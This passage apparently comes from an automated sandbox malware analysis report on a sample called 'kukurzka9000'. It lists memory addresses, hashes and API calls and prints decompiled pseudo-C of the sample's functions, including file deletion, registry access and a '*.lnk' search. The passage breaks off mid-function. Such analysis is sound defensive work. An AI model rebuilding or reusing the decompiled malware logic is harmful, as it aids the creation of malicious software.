                                                                                                                                                                        0x00405053
                                                                                                                                                                        0x0040507c
                                                                                                                                                                        0x00405087
                                                                                                                                                                        0x0040508f
                                                                                                                                                                        0x004050a3
                                                                                                                                                                        0x004050b0
                                                                                                                                                                        0x004050df
                                                                                                                                                                        0x004050ea
                                                                                                                                                                        0x004050ec
                                                                                                                                                                        0x004050f2
                                                                                                                                                                        0x004050fa
                                                                                                                                                                        0x00405111
                                                                                                                                                                        0x0040514d
                                                                                                                                                                        0x0040515b
                                                                                                                                                                        0x0040515e
                                                                                                                                                                        0x00405160
                                                                                                                                                                        0x00405162
                                                                                                                                                                        0x00405169
                                                                                                                                                                        0x0040516b
                                                                                                                                                                        0x0040516c
                                                                                                                                                                        0x00405172
                                                                                                                                                                        0x00405178
                                                                                                                                                                        0x00405180
                                                                                                                                                                        0x00405181
                                                                                                                                                                        0x00405186
                                                                                                                                                                        0x0040518f
                                                                                                                                                                        0x004051a5
                                                                                                                                                                        0x004051b1
                                                                                                                                                                        0x004051c4
                                                                                                                                                                        0x004051d0
                                                                                                                                                                        0x004051d4
                                                                                                                                                                        0x004051d9
                                                                                                                                                                        0x004051e4
                                                                                                                                                                        0x004051ec
                                                                                                                                                                        0x004051f5
                                                                                                                                                                        0x004051fa
                                                                                                                                                                        0x00405201
                                                                                                                                                                        0x00405204
                                                                                                                                                                        0x00405209
                                                                                                                                                                        0x0040520c
                                                                                                                                                                        0x00405216
                                                                                                                                                                        0x00405224
                                                                                                                                                                        0x0040523a
                                                                                                                                                                        0x0040523e
                                                                                                                                                                        0x0040527b
                                                                                                                                                                        0x00405240
                                                                                                                                                                        0x00405254
                                                                                                                                                                        0x00405256
                                                                                                                                                                        0x0040525b
                                                                                                                                                                        0x00405271
                                                                                                                                                                        0x00405276
                                                                                                                                                                        0x0040525b
                                                                                                                                                                        0x0040527f
                                                                                                                                                                        0x00405288
                                                                                                                                                                        0x00405291
                                                                                                                                                                        0x0040529a
                                                                                                                                                                        0x0040529a
                                                                                                                                                                        0x004051b1
                                                                                                                                                                        0x00405186
                                                                                                                                                                        0x004052a3
                                                                                                                                                                        0x004052ac
                                                                                                                                                                        0x004052b5
                                                                                                                                                                        0x004052be
                                                                                                                                                                        0x004052c5
                                                                                                                                                                        0x004052cc
                                                                                                                                                                        0x004052d2
                                                                                                                                                                        0x004052d5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004052d5
                                                                                                                                                                        0x00405116
                                                                                                                                                                        0x0040511f
                                                                                                                                                                        0x00405128
                                                                                                                                                                        0x00405131
                                                                                                                                                                        0x00405137
                                                                                                                                                                        0x00405139
                                                                                                                                                                        0x00405139
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405139
                                                                                                                                                                        0x004050b5
                                                                                                                                                                        0x004050be
                                                                                                                                                                        0x004050c7
                                                                                                                                                                        0x004050cd
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004050cd
                                                                                                                                                                        0x00405058
                                                                                                                                                                        0x00405061
                                                                                                                                                                        0x00405067
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405067
                                                                                                                                                                        0x00405002
                                                                                                                                                                        0x00405008
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00404fc3
                                                                                                                                                                        0x00404fc5
                                                                                                                                                                        0x00404fc7
                                                                                                                                                                        0x00404fc9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00404fcd
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00404fcd

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 0-1731603023
                                                                                                                                                                        • Opcode ID: 920dc5c48ddd3d6d108e0df5f74ef4019b895daab8de7caf07ff3aedad1c931d
                                                                                                                                                                        • Instruction ID: 5fa1488eec15b5c1e265b2db03af03f3b622e2a9793851092692c2b0c9e4c5eb
                                                                                                                                                                        • Opcode Fuzzy Hash: 920dc5c48ddd3d6d108e0df5f74ef4019b895daab8de7caf07ff3aedad1c931d
                                                                                                                                                                        • Instruction Fuzzy Hash: 5DA1D371A00215AFDB009BEADE45EAE7BB5EF48310F104535F614F72E0DBB46D218B69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                        			E00409BD9(void* __ecx, short* __edx) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				signed int _v24;
                                                                                                                                                                        				void* _v28;
                                                                                                                                                                        				void* _v32;
                                                                                                                                                                        				void* _v36;
                                                                                                                                                                        				signed int _v40;
                                                                                                                                                                        				short* _v44;
                                                                                                                                                                        				void* _v48;
                                                                                                                                                                        				signed int _v52;
                                                                                                                                                                        				char _v56;
                                                                                                                                                                        				signed int _t60;
                                                                                                                                                                        				void* _t62;
                                                                                                                                                                        				void* _t71;
                                                                                                                                                                        				void* _t78;
                                                                                                                                                                        				void* _t85;
                                                                                                                                                                        				void* _t94;
                                                                                                                                                                        				signed int _t103;
                                                                                                                                                                        				void* _t109;
                                                                                                                                                                        				void* _t111;
                                                                                                                                                                        				void* _t112;
                                                                                                                                                                        				void* _t115;
                                                                                                                                                                        				char _t116;
                                                                                                                                                                        				void* _t117;
                                                                                                                                                                        				void* _t127;
                                                                                                                                                                        				void* _t140;
                                                                                                                                                                        				signed int _t142;
                                                                                                                                                                        				void* _t144;
                                                                                                                                                                        				signed int _t146;
                                                                                                                                                                        				void* _t165;
                                                                                                                                                                        				void* _t173;
                                                                                                                                                                        				signed int _t177;
                                                                                                                                                                        				void* _t178;
                                                                                                                                                                        				void* _t180;
                                                                                                                                                                        				void* _t182;
                                                                                                                                                                        				void* _t184;
                                                                                                                                                                        				void* _t187;
                                                                                                                                                                        				void* _t188;
                                                                                                                                                                        				signed int _t193;
                                                                                                                                                                        				signed int _t197;
                                                                                                                                                                        				void* _t199;
                                                                                                                                                                        				void* _t202;
                                                                                                                                                                        
                                                                                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                                                                                        				_t142 = 0;
                                                                                                                                                                        				_v44 = __edx;
                                                                                                                                                                        				_v40 = _v40 & 0;
                                                                                                                                                                        				_t60 =  *((intOrPtr*)( *0x40e18c))(__ecx,  *0x40e2d8);
                                                                                                                                                                        				_t177 = _t60;
                                                                                                                                                                        				if(_t177 == 0) {
                                                                                                                                                                        					return _t60 | 0xffffffff;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t178 = _t177 + 0xc;
                                                                                                                                                                        				_t62 =  *((intOrPtr*)( *0x40e18c))(_t178,  *0x40e1f0);
                                                                                                                                                                        				if(_t62 == 0) {
                                                                                                                                                                        					L5:
                                                                                                                                                                        					_v8 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t178, _t188) + _t64);
                                                                                                                                                                        					if(E0040A3E4(_t178,  &_v8, 0, _t142) != 0) {
                                                                                                                                                                        						_t180 = _t178 + _t142 * 2 + 2;
                                                                                                                                                                        						_t71 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t180) + _t69);
                                                                                                                                                                        						_v12 = _t71;
                                                                                                                                                                        						_t193 =  *((intOrPtr*)( *0x40e18c))(_t180,  *0x40e20c) - _t180 >> 1;
                                                                                                                                                                        						if(E0040A3E4(_t180,  &_v12, 0, _t193) != 0) {
                                                                                                                                                                        							_t182 = _t180 + _t193 * 2 + 2;
                                                                                                                                                                        							_t78 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t182) + _t76);
                                                                                                                                                                        							_v16 = _t78;
                                                                                                                                                                        							_t197 =  *((intOrPtr*)( *0x40e18c))(_t182,  *0x40e20c) - _t182 >> 1;
                                                                                                                                                                        							if(E0040A3E4(_t182,  &_v16, 0, _t197) != 0) {
                                                                                                                                                                        								_t184 = _t182 + _t197 * 2 + 2;
                                                                                                                                                                        								_t85 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t184) + _t83);
                                                                                                                                                                        								_push( *0x40e228);
                                                                                                                                                                        								_v20 = _t85;
                                                                                                                                                                        								_push(_t184);
                                                                                                                                                                        								if(E0040A3E4(_t184,  &_v20, 0,  *((intOrPtr*)( *0x40e18c))() - _t184 >> 1) != 0) {
                                                                                                                                                                        									_t199 =  *((intOrPtr*)( *0x40e044))(0x40, 0x4000);
                                                                                                                                                                        									_v28 = _t199;
                                                                                                                                                                        									_t94 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
                                                                                                                                                                        									_push(0);
                                                                                                                                                                        									_t144 = _t94;
                                                                                                                                                                        									_push(0x1a);
                                                                                                                                                                        									_push(_t144);
                                                                                                                                                                        									_push(0);
                                                                                                                                                                        									if( *((intOrPtr*)( *0x40e0c4))() != 0) {
                                                                                                                                                                        										_push(_v12);
                                                                                                                                                                        										_push(_t144);
                                                                                                                                                                        										_push(_t144);
                                                                                                                                                                        										if( *((intOrPtr*)( *0x40e000))() != 0) {
                                                                                                                                                                        											_v40 = 1;
                                                                                                                                                                        											E004052DA(_t144, _t144, _v8, _v16, _v20, _t199,  &_v24);
                                                                                                                                                                        											if(_v24 > 0) {
                                                                                                                                                                        												_t109 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        												_t111 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        												_t173 = 0x10;
                                                                                                                                                                        												_t112 = E0040A05F(_t109, _t173);
                                                                                                                                                                        												_t202 = _t112;
                                                                                                                                                                        												_v48 = _t202;
                                                                                                                                                                        												_t115 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t111,  *0x40e210), _t202);
                                                                                                                                                                        												_v52 = _v52 & 0x00000000;
                                                                                                                                                                        												_v36 = _t115;
                                                                                                                                                                        												_t116 =  *0x40e204; // 0x6587d8
                                                                                                                                                                        												_v56 = _t116;
                                                                                                                                                                        												_t117 = E00408619( &_v36);
                                                                                                                                                                        												_v32 = _t117;
                                                                                                                                                                        												_t187 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
                                                                                                                                                                        												_t165 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t202, 0xffffffff, 0, 0, 0, 0);
                                                                                                                                                                        												if(_t165 == 0) {
                                                                                                                                                                        													_t199 = _v28;
                                                                                                                                                                        												} else {
                                                                                                                                                                        													_t127 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t202, 0xffffffff, _t187, _t165, 0, 0);
                                                                                                                                                                        													_t199 = _v28;
                                                                                                                                                                        													if(_t127 != 0) {
                                                                                                                                                                        														E00407EDB(_v44, _t187, 0, 0, _v24, _t199, _v32,  &_v56);
                                                                                                                                                                        													}
                                                                                                                                                                        												}
                                                                                                                                                                        												LocalFree(_t187);
                                                                                                                                                                        												LocalFree(_v32);
                                                                                                                                                                        												LocalFree(_v36);
                                                                                                                                                                        												LocalFree(_v48);
                                                                                                                                                                        											}
                                                                                                                                                                        										}
                                                                                                                                                                        									}
                                                                                                                                                                        									LocalFree(_v8);
                                                                                                                                                                        									LocalFree(_v12);
                                                                                                                                                                        									LocalFree(_v16);
                                                                                                                                                                        									LocalFree(_v20);
                                                                                                                                                                        									LocalFree(_t144);
                                                                                                                                                                        									LocalFree(_t199);
                                                                                                                                                                        									_t103 = _v40;
                                                                                                                                                                        									L23:
                                                                                                                                                                        									return _t103;
                                                                                                                                                                        								}
                                                                                                                                                                        								LocalFree(_v8);
                                                                                                                                                                        								LocalFree(_v12);
                                                                                                                                                                        								LocalFree(_v16);
                                                                                                                                                                        								LocalFree(_v20);
                                                                                                                                                                        								_push(0xfffffffa);
                                                                                                                                                                        								L13:
                                                                                                                                                                        								_pop(_t103);
                                                                                                                                                                        								goto L23;
                                                                                                                                                                        							}
                                                                                                                                                                        							LocalFree(_v8);
                                                                                                                                                                        							LocalFree(_v12);
                                                                                                                                                                        							LocalFree(_v16);
                                                                                                                                                                        							_push(0xfffffffb);
                                                                                                                                                                        							goto L13;
                                                                                                                                                                        						}
                                                                                                                                                                        						LocalFree(_v8);
                                                                                                                                                                        						LocalFree(_v12);
                                                                                                                                                                        						_push(0xfffffffc);
                                                                                                                                                                        						goto L13;
                                                                                                                                                                        					}
                                                                                                                                                                        					LocalFree(_v8);
                                                                                                                                                                        					_push(0xfffffffd);
                                                                                                                                                                        					goto L13;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t146 = _t62 - _t178;
                                                                                                                                                                        					_t142 = _t146 >> 1;
                                                                                                                                                                        					if(_t146 >= 0) {
                                                                                                                                                                        						goto L5;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t140 = 0xfffffffe;
                                                                                                                                                                        					return _t140;
                                                                                                                                                                        				}
                                                                                                                                                                        			}















































                                                                                                                                                                        0x00409be4
                                                                                                                                                                        0x00409bf0
                                                                                                                                                                        0x00409bf2
                                                                                                                                                                        0x00409bf5
                                                                                                                                                                        0x00409bf9
                                                                                                                                                                        0x00409bfb
                                                                                                                                                                        0x00409bff
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00409c01
                                                                                                                                                                        0x00409c14
                                                                                                                                                                        0x00409c18
                                                                                                                                                                        0x00409c1c
                                                                                                                                                                        0x00409c2e
                                                                                                                                                                        0x00409c4a
                                                                                                                                                                        0x00409c58
                                                                                                                                                                        0x00409c78
                                                                                                                                                                        0x00409c83
                                                                                                                                                                        0x00409c8b
                                                                                                                                                                        0x00409c9f
                                                                                                                                                                        0x00409cae
                                                                                                                                                                        0x00409cd7
                                                                                                                                                                        0x00409ce2
                                                                                                                                                                        0x00409cea
                                                                                                                                                                        0x00409cfe
                                                                                                                                                                        0x00409d0b
                                                                                                                                                                        0x00409d3a
                                                                                                                                                                        0x00409d45
                                                                                                                                                                        0x00409d47
                                                                                                                                                                        0x00409d4d
                                                                                                                                                                        0x00409d55
                                                                                                                                                                        0x00409d6c
                                                                                                                                                                        0x00409da8
                                                                                                                                                                        0x00409db6
                                                                                                                                                                        0x00409db9
                                                                                                                                                                        0x00409dbb
                                                                                                                                                                        0x00409dbd
                                                                                                                                                                        0x00409dc4
                                                                                                                                                                        0x00409dc6
                                                                                                                                                                        0x00409dc7
                                                                                                                                                                        0x00409dcd
                                                                                                                                                                        0x00409dd3
                                                                                                                                                                        0x00409ddb
                                                                                                                                                                        0x00409ddc
                                                                                                                                                                        0x00409de1
                                                                                                                                                                        0x00409dea
                                                                                                                                                                        0x00409e00
                                                                                                                                                                        0x00409e0c
                                                                                                                                                                        0x00409e1f
                                                                                                                                                                        0x00409e2b
                                                                                                                                                                        0x00409e2f
                                                                                                                                                                        0x00409e34
                                                                                                                                                                        0x00409e3f
                                                                                                                                                                        0x00409e47
                                                                                                                                                                        0x00409e50
                                                                                                                                                                        0x00409e55
                                                                                                                                                                        0x00409e5c
                                                                                                                                                                        0x00409e5f
                                                                                                                                                                        0x00409e64
                                                                                                                                                                        0x00409e67
                                                                                                                                                                        0x00409e71
                                                                                                                                                                        0x00409e7f
                                                                                                                                                                        0x00409e95
                                                                                                                                                                        0x00409e99
                                                                                                                                                                        0x00409ed6
                                                                                                                                                                        0x00409e9b
                                                                                                                                                                        0x00409eaf
                                                                                                                                                                        0x00409eb1
                                                                                                                                                                        0x00409eb6
                                                                                                                                                                        0x00409ecc
                                                                                                                                                                        0x00409ed1
                                                                                                                                                                        0x00409eb6
                                                                                                                                                                        0x00409eda
                                                                                                                                                                        0x00409ee3
                                                                                                                                                                        0x00409eec
                                                                                                                                                                        0x00409ef5
                                                                                                                                                                        0x00409ef5
                                                                                                                                                                        0x00409e0c
                                                                                                                                                                        0x00409de1
                                                                                                                                                                        0x00409efe
                                                                                                                                                                        0x00409f07
                                                                                                                                                                        0x00409f10
                                                                                                                                                                        0x00409f19
                                                                                                                                                                        0x00409f20
                                                                                                                                                                        0x00409f27
                                                                                                                                                                        0x00409f2d
                                                                                                                                                                        0x00409f30
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00409f30
                                                                                                                                                                        0x00409d71
                                                                                                                                                                        0x00409d7a
                                                                                                                                                                        0x00409d83
                                                                                                                                                                        0x00409d8c
                                                                                                                                                                        0x00409d92
                                                                                                                                                                        0x00409d94
                                                                                                                                                                        0x00409d94
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00409d94
                                                                                                                                                                        0x00409d10
                                                                                                                                                                        0x00409d19
                                                                                                                                                                        0x00409d22
                                                                                                                                                                        0x00409d28
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00409d28
                                                                                                                                                                        0x00409cb3
                                                                                                                                                                        0x00409cbc
                                                                                                                                                                        0x00409cc2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00409cc2
                                                                                                                                                                        0x00409c5d
                                                                                                                                                                        0x00409c63
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00409c1e
                                                                                                                                                                        0x00409c20
                                                                                                                                                                        0x00409c22
                                                                                                                                                                        0x00409c24
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00409c28
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00409c28

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 0-1731603023
                                                                                                                                                                        • Opcode ID: b9d1e3923032fdb29136ca73d0ba7c8e72e19fc8f1c47f7929fd4c366d02da90
                                                                                                                                                                        • Instruction ID: 1477a699490ab6d120e37a0d83275f9d0d9eb78bf41bd20a7fb73821678a20ad
                                                                                                                                                                        • Opcode Fuzzy Hash: b9d1e3923032fdb29136ca73d0ba7c8e72e19fc8f1c47f7929fd4c366d02da90
                                                                                                                                                                        • Instruction Fuzzy Hash: FCA10572A00215BFEB00DBAADE45EAE7BB5EB48310F144935F614F32E1CB745D208B69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02392837
                                                                                                                                                                          • Part of subcall function 02399C12: LocalFree.KERNEL32(00000000,?,?,02391F22), ref: 02399C75
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02392886
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02392895
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 023928A4
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 023928AF
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 023928BA
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 023929DF
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 023929E6
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02392A12
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 02392A19
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02392CBB
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 02392CC2
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 02392CC9
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$DeleteFile
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 2194112602-1731603023
                                                                                                                                                                        • Opcode ID: 743d3936997c352c872d7cf10618c75b7b5c1b542be5bb5ea46889d68cad6593
                                                                                                                                                                        • Instruction ID: 940e6fd2e30b30dab7dd2a0330c9b92236b505eebe83a72534290426380f0d18
                                                                                                                                                                        • Opcode Fuzzy Hash: 743d3936997c352c872d7cf10618c75b7b5c1b542be5bb5ea46889d68cad6593
                                                                                                                                                                        • Instruction Fuzzy Hash: 31F18B71900625EFDF15DFA6EE48AAE7BB5FB09310F104824F915B32A0DB749920CF69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02391DB9
                                                                                                                                                                          • Part of subcall function 02399C12: LocalFree.KERNEL32(00000000,?,?,02391F22), ref: 02399C75
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02391E08
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02391E17
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02391E26
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02391E31
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02391E3C
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02391F61
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 02391F68
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02391F94
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 02391F9B
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02392213
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 0239221A
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 02392221
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$DeleteFile
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 2194112602-1731603023
                                                                                                                                                                        • Opcode ID: 14fe85006a4507c3b927e3539246f7d6684f254c4d25abfe7b05e8fd786a1328
                                                                                                                                                                        • Instruction ID: faa710d317d4a4022a3a805e695891e262593b7dbe972ebb913132864ef72a55
                                                                                                                                                                        • Opcode Fuzzy Hash: 14fe85006a4507c3b927e3539246f7d6684f254c4d25abfe7b05e8fd786a1328
                                                                                                                                                                        • Instruction Fuzzy Hash: B1F19E71900225EFDF15DFA6EE44AAE7BB5FB09300F004924E915B72A0DB749921CF69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02395160
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal
                                                                                                                                                                        • String ID: *.lnk$.$pXet
                                                                                                                                                                        • API String ID: 2826327444-4221916764
                                                                                                                                                                        • Opcode ID: 3150c680f21ee6bfbfefdc720a97a6de524c9d957b265806f1dde896eba8a9dd
                                                                                                                                                                        • Instruction ID: 225a7a973515cb0264348a1740feab28944d79b8f9921658684ef40730b5ec61
                                                                                                                                                                        • Opcode Fuzzy Hash: 3150c680f21ee6bfbfefdc720a97a6de524c9d957b265806f1dde896eba8a9dd
                                                                                                                                                                        • Instruction Fuzzy Hash: 11D1DD71A00219ABDF15DFA5DD44FAE77B6EF89300F004528FA15B72A0DBB0A991CF64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 02399A77: GlobalFree.KERNEL32(02391F22), ref: 02399AC4
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 02398B3A
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02398BA5
                                                                                                                                                                        • RegCloseKey.ADVAPI32(000F003F), ref: 02398BAE
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 02398CC2
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02398D4B
                                                                                                                                                                        • RegCloseKey.ADVAPI32(000F003F), ref: 02398D54
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Close$Free$Local$Global
                                                                                                                                                                        • String ID: ?$pXet
                                                                                                                                                                        • API String ID: 669500343-920479820
                                                                                                                                                                        • Opcode ID: 810266c1436c83679cd00da3e4cb33eccda6db4c1c17b890659f6915c65a8da9
                                                                                                                                                                        • Instruction ID: b6e73ac9361b8b3c6236b60e69e9ba895aac6d91c820be93fd6ee6192e14eb84
                                                                                                                                                                        • Opcode Fuzzy Hash: 810266c1436c83679cd00da3e4cb33eccda6db4c1c17b890659f6915c65a8da9
                                                                                                                                                                        • Instruction Fuzzy Hash: 8DB17E71A01219BFDF04CFA6DD85EAEBBB9EF4A340F104425FA05B7260D7709A10CB64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                        			E0040864C(void* __ecx, intOrPtr __edx) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				void* _v24;
                                                                                                                                                                        				signed int _v28;
                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                        				void* _t55;
                                                                                                                                                                        				void* _t61;
                                                                                                                                                                        				void* _t73;
                                                                                                                                                                        				void* _t74;
                                                                                                                                                                        				signed int _t81;
                                                                                                                                                                        				void* _t83;
                                                                                                                                                                        				void* _t90;
                                                                                                                                                                        				signed int _t91;
                                                                                                                                                                        				void* _t100;
                                                                                                                                                                        				void* _t101;
                                                                                                                                                                        				void* _t103;
                                                                                                                                                                        				signed int _t104;
                                                                                                                                                                        				void* _t106;
                                                                                                                                                                        				void* _t107;
                                                                                                                                                                        				signed int _t111;
                                                                                                                                                                        				void* _t112;
                                                                                                                                                                        				void* _t113;
                                                                                                                                                                        				void* _t115;
                                                                                                                                                                        				void* _t122;
                                                                                                                                                                        				intOrPtr* _t126;
                                                                                                                                                                        				signed int _t137;
                                                                                                                                                                        				intOrPtr _t146;
                                                                                                                                                                        				void* _t150;
                                                                                                                                                                        				void* _t152;
                                                                                                                                                                        
                                                                                                                                                                        				_t115 = __ecx;
                                                                                                                                                                        				_v32 = __edx;
                                                                                                                                                                        				_t152 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(__ecx) + _t45);
                                                                                                                                                                        				_push(_t115);
                                                                                                                                                                        				_v12 = _t152;
                                                                                                                                                                        				if( *((intOrPtr*)( *0x40e08c))() == 0x26) {
                                                                                                                                                                        					L25:
                                                                                                                                                                        					if(_t152 != 0) {
                                                                                                                                                                        						LocalFree(_t152);
                                                                                                                                                                        					}
                                                                                                                                                                        					return 1;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					goto L1;
                                                                                                                                                                        				}
                                                                                                                                                                        				do {
                                                                                                                                                                        					L1:
                                                                                                                                                                        					_t55 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t115) + _t53);
                                                                                                                                                                        					_v8 = _t55;
                                                                                                                                                                        					_t150 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t115) + _t56);
                                                                                                                                                                        					_v16 = _t150;
                                                                                                                                                                        					_t61 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t115) + _t59);
                                                                                                                                                                        					_t152 = _t61;
                                                                                                                                                                        					_v24 = _t152;
                                                                                                                                                                        					_t122 =  *((intOrPtr*)( *0x40e18c))(_t115,  *0x40e1ec);
                                                                                                                                                                        					_t63 = 0;
                                                                                                                                                                        					_v28 = 0;
                                                                                                                                                                        					if(_t122 == 0) {
                                                                                                                                                                        						L3:
